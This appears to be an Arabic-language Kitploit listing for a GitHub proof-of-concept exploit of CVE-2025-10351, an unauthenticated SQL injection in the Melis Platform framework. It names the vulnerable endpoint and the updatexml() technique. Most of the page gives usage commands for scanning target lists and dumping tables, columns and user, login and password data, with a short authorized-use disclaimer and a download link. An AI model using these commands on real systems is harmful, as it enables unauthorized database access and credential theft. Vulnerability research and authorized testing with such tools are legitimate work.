Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-10351-POC — استغلال لثغرة CVE-2025-10351. حقن SQL في Melis Platform Framework | Kitploit
أدوات/GitHubGitHub/ivansmc/cve-2025-10351-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubivansmc/cve-2025-10351-poc

CVE-2025-10351-POC

استغلال لثغرة CVE-2025-10351. حقن SQL في Melis Platform Framework

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-10351 POC - استغلال حقن SQL 💉

POC لـ CVE-2025-10351: ثغرة حقن SQL غير مصادق عليها تؤثر على نقطة نهاية محددة في إطار عمل Melis Platform.

status python status


🔗 المراجع

  • 📄 CVE-2025-10351 على MITRE
  • 📄 تحذير منصة Melis على INCIBE (المعهد الإسباني للأمن السيبراني)

🚀 الوصف

يستهدف هذا POC ثغرة حقن SQL غير مصادق عليها قائمة على الأخطاء (error-based) في نقطة النهاية:

root@kitploit:~
melis/MelisCms/PageEdition/getTinyTemplates?idPage=

يستغل updatexml() في MySQL لاستخراج:

  • أسماء الجداول
  • أسماء الأعمدة
  • البيانات من أعمدة محددة أو جميع الأعمدة

كما يكتشف ناقلات حقن SQL المستند إلى الوقت (time-based SQLi) المحتملة لاستغلال يدوي إضافي.


🛠️ المتطلبات

ثبّت التبعيات باستخدام:

root@kitploit:~
pip3 install -r requirements.txt

🧪 الاستخدام

فحص أساسي

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80

من قائمة عناوين URL

root@kitploit:~
python3 CVE-2025-10351-POC.py -l targets.txt

استخراج جميع أسماء الجداول

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at

استخراج جميع أسماء الأعمدة من جدول

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users

استخراج جميع البيانات من جميع الأعمدة

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac

استخراج أعمدة محددة

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password

استخدام بروكسي مع وضع insecure وملفات تعريف الارتباط ووضع التصحيح

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug

⚙️ الخيارات


📤 المخرجات

  • الجداول المستخرجة محفوظة في tables_extracted.txt
  • البيانات المستخرجة محفوظة في <table_name>_data.txt

⚠️ إخلاء مسؤولية

هذا المستند مخصص لاختبار الأمان والتصحيح المصرح بهما فقط. لا تستخدم هذا الـ PoC أو خطوات إعادة الإنتاج ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن سوء الاستخدام.


صُنع بـ ❤️ بواسطة Manuel Iván San Martín Castillo

تنزيل الأداة
الوسيطالوصف
-uعنوان الهدف
-pالمنفذ (80، 443، إلخ.)
-lملف يحتوي على قائمة عناوين URL
-sوقت الانتظار لاختبارات time-based (الافتراضي: 1 ثانية)
-atتفريغ جميع أسماء الجداول
-tتحديد اسم الجدول
-acتفريغ جميع أعمدة الجدول المحدد
-cقائمة بأسماء الأعمدة مفصولة بفواصل لتفريغها
--proxyبروكسي Burp http://127.0.0.1:8080
--insecureتعطيل فحوصات TLS عند استخدام اتصالات البروكسي
--cookieملفات تعريف الارتباط لطلبات المصادقة
--debugوضع التصحيح